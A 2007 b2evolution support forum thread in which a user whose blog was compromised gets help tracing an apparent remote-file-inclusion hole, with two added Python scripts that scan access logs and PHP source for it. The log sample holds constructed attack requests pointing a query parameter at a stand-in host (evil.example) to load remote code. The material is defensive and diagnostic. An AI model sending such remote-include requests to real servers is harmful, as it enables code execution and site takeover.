1 stevet Jun 19, 2007 07:34
3 edb Jun 19, 2007 21:04
stevet, I can't help with this issue, but those who can will surely want to know some stuff. What version are you running? How much did you hack up your installation - if at all? Are you using a 'standard' skin, or did you customize a skin more than the "include html" you showed above?
There are very few people who can help you with this, and even though I am not one of them I feel very confident saying that without more info they will be unable to do anything. I'm probably wrong, but right now I feel confident this is a truthful statement. If it is an exploit of b2evolution I have no doubt the developers - and all other users - will want to know about it. OTOH if it is a hole you opened up then everyone will want to know what the hole was so that it can be avoided in the future.
4 stevet Jun 19, 2007 21:17
EdB (and anyone else): The version is 1.9.3.
I've not made any substantial hacks, just a couple of minor ones in the media uploader. The skin is my own customized layout, but just a cosmetic shuffling of the Custom (as far as I recall) skin. Most of the changes are in CSS.
5 balupton Jun 19, 2007 22:00
Apparently there's an unsanitized include() statement performed on the $... variable of your script, which allows attackers to execute arbitrary PHP code with your user permissions.
That could be anywhere, the reference to index.php just means that was the script that was accessed to perform the exploit.
The stuff that is of interest is /index.php?var=XXXX
From that you know:
- The variable that has caused the problem is that $var variable (I would scan all your files in dreamweaver or something to see if any files use a variable called $var).
- The evil remote code is located at XXXX.
So what has happened is that somewhere inside the executed code there was an include $var; or something similar, thus running the script located at XXXX, which did the evil work.
If you have a backup of your blog, you could test this theory by making a .txt file containing <?php die('test'); ?> and then going to index.php?var=txtfilelocation.
Stevet, I've also removed the variable name and script location from your post to stop any curious readers from performing the exploit if there is indeed a problem. (The smart people that EdB was talking about still have access to them).
Update: I've tested this theory on my local install and nothing bad happened, so I'm gonna go with there being just some dodgy code on your server that had an include $var somewhere... So if you can find that, it's smooth sailing.
I would also advise you go and change all your passwords...
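The reasoning in the post above (a request to index.php whose query parameter carries the location of a remote script) can be turned into a log check. What follows is an added example, not code from the thread or from b2evolution: it parses constructed Apache combined-format lines (hypothetical hosts and addresses) and flags any query-string parameter whose value is itself a URL, which is the tell-tale of a remote-include attempt.

```python
"""Flag access-log requests whose query-string parameters carry a remote URL,
the /index.php?var=<remote script> pattern discussed above. Added example;
the log lines are constructed, not taken from the poster's server."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines (hypothetical IPs and hostnames).
SAMPLE_LOG = """\
203.0.113.5 - - [19/Jun/2007:07:12:01 +0000] "GET /index.php?blog=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [19/Jun/2007:07:12:44 +0000] "GET /index.php?var=http://evil.example/remote.txt HTTP/1.1" 200 412 "-" "libwww-perl/5.805"
203.0.113.9 - - [19/Jun/2007:07:13:02 +0000] "GET /index.php?var=ftp://evil.example/x.txt HTTP/1.1" 200 412 "-" "libwww-perl/5.805"
203.0.113.9 - - [19/Jun/2007:07:13:30 +0000] "GET /index.php?var=http%3A%2F%2Fevil.example%2Fx.txt HTTP/1.1" 200 412 "-" "libwww-perl/5.805"
198.51.100.2 - - [19/Jun/2007:07:20:10 +0000] "GET /skins/custom/style.css HTTP/1.1" 200 9000 "http://blog.example/" "Mozilla/5.0"
"""

# client, identd, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a URL is what a remote include needs.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_remote_include_attempts(log_text):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group('target'))
        # parse_qsl percent-decodes, so an encoded http%3A%2F%2F is caught too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                findings.append({
                    'ip': m.group('ip'),
                    'time': m.group('ts'),
                    'script': parts.path,
                    'param': name,
                    'value': value,
                    'status': int(m.group('status')),
                })
    return findings


def sources_by_ip(findings):
    """Group flagged values by client address to see who was probing."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f['ip'], []).append(f['value'])
    return grouped


if __name__ == '__main__':
    for f in find_remote_include_attempts(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['script']}?{f['param']}= -> {f['value']} ({f['status']})")
```

Run it against a real access log by reading the file into `find_remote_include_attempts`; a 200 status on such a request is the case worth looking at, since it means the script did not refuse the parameter.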
6 stevet Jun 19, 2007 22:37
You say I should search for $var, yeah??
You mean on the server??
Do I need to search all the files on the server or just the B2 installation?
7 balupton Jun 19, 2007 22:51
If you still have access to the server then yeah; if you don't, just do your local copy. Could be worth doing both if you don't find it in one. So search all files inside the b2evolution folder for $var, providing that your b2evo install only includes files from its folder. Could be worth doing the whole site if need be, but just start off small first and expand if needed.
If you get too many results to bother with by searching with "$var" then just try things like: "$var " and "$var." and "$var)" and "$var;" and "$var+" and "$var-" and "$var," and "$var/" and "$var*" (I think that's all) so that way it doesn't pick up the "$var" in things like "$variable".
Note: by $var I do mean what $var was originally, in case that wasn't clear.
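The search described in the post above (matching "$var" without also matching "$variable") and the include-statement hunt behind it can both be scripted. The following is an added example, not code from the thread or from b2evolution: it matches the variable name as a whole token, and it lists every include/require whose operand is built from a variable, classifying the variable by whether it is assigned from request data, assigned locally, or never assigned in that file at all (with register_globals enabled, a never-assigned variable can be populated from the request). The PHP files it scans are constructed for the demo.

```python
"""Two searches over PHP source that a defender can run on a copied install:
(a) whole-token uses of one variable name, so "$var" does not match
"$variable", and (b) include/require statements whose operand is built from
a variable rather than a fixed string. Added example; the PHP below is
constructed and is not b2evolution code."""
import re

# Constructed sample files keyed by path (hypothetical contents).
SAMPLE_FILES = {
    'index.php': (
        "<?php\n"
        "require dirname(__FILE__).'/conf/_config.php';\n"
        "$var = $_GET['var'];\n"
        "$variable = 1;\n"
        "include $var;\n"
        "echo $variable;\n"
    ),
    'skins/custom/_main.php': (
        "<?php\n"
        "include_once( $skins_path.'_menu.php' );\n"
        "require_once 'footer.php';\n"
    ),
    'plugins/_ok.php': (
        "<?php\n"
        "$lib = dirname(__FILE__).'/lib.php';\n"
        "require_once( $lib );\n"
    ),
}

# include/require[_once], optional parentheses, operand up to the semicolon.
INCLUDE_RE = re.compile(r'\b(include|require)(?:_once)?\b\s*\(?\s*([^;]*?)\s*\)?\s*;')
REQUEST_SOURCES = r'\$_(?:GET|POST|REQUEST|COOKIE)\b'


def find_variable_uses(source, name):
    """Return (line_number, line_text) for every whole-token use of $name."""
    token = re.compile(r'\$' + re.escape(name) + r'\b')
    return [(n, line) for n, line in enumerate(source.splitlines(), 1)
            if token.search(line)]


def classify_variable(source, name):
    """How does this file populate $name before using it in an include?"""
    escaped = r'\$' + re.escape(name)
    if re.search(escaped + r'\s*=\s*' + REQUEST_SOURCES, source):
        return 'user-controlled'   # assigned straight from request data
    if not re.search(escaped + r'\s*=[^=]', source):
        return 'unassigned'        # never set here; register_globals would let the request set it
    return 'review'                # set locally; check what feeds that assignment


def scan_files(files):
    """List include/require statements whose operand contains a variable."""
    findings = []
    for path, source in files.items():
        for m in INCLUDE_RE.finditer(source):
            operand = m.group(2)
            var = re.search(r'\$(\w+)', operand)
            if not var:
                continue  # fixed string path: nothing the request can change
            findings.append({
                'file': path,
                'line': source.count('\n', 0, m.start()) + 1,
                'statement': m.group(0).strip(),
                'variable': var.group(1),
                'risk': classify_variable(source, var.group(1)),
            })
    return findings


if __name__ == '__main__':
    for n, text in find_variable_uses(SAMPLE_FILES['index.php'], 'var'):
        print(f"index.php:{n}: {text}")
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['file']}:{f['line']} [{f['risk']}] {f['statement']}")
```

To use it on a real copy, build the `files` dictionary by walking the install directory and reading every .php file; anything reported as user-controlled is the kind of statement the earlier post is describing, and the fix is to replace the variable with a path chosen from a fixed list rather than taken from the request.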
8 stevet Jun 19, 2007 22:56
Note: by $var I do mean what $var was originally, in case that wasn't clear.
I think I gotcha, but I just sent you a PM anyhow.
9 stevet Jun 19, 2007 23:03
Nope, I'm lost - can you PM me what I should be searching for?
10 balupton Jun 19, 2007 23:04
Will do.
11 stevet Jun 19, 2007 23:53
I have run a search for the code you pointed out in a local copy of all the B2 files and I have found nothing.
This just got worse. Our host has locked down our server, claiming they are getting large numbers of complaints about spam coming from our site.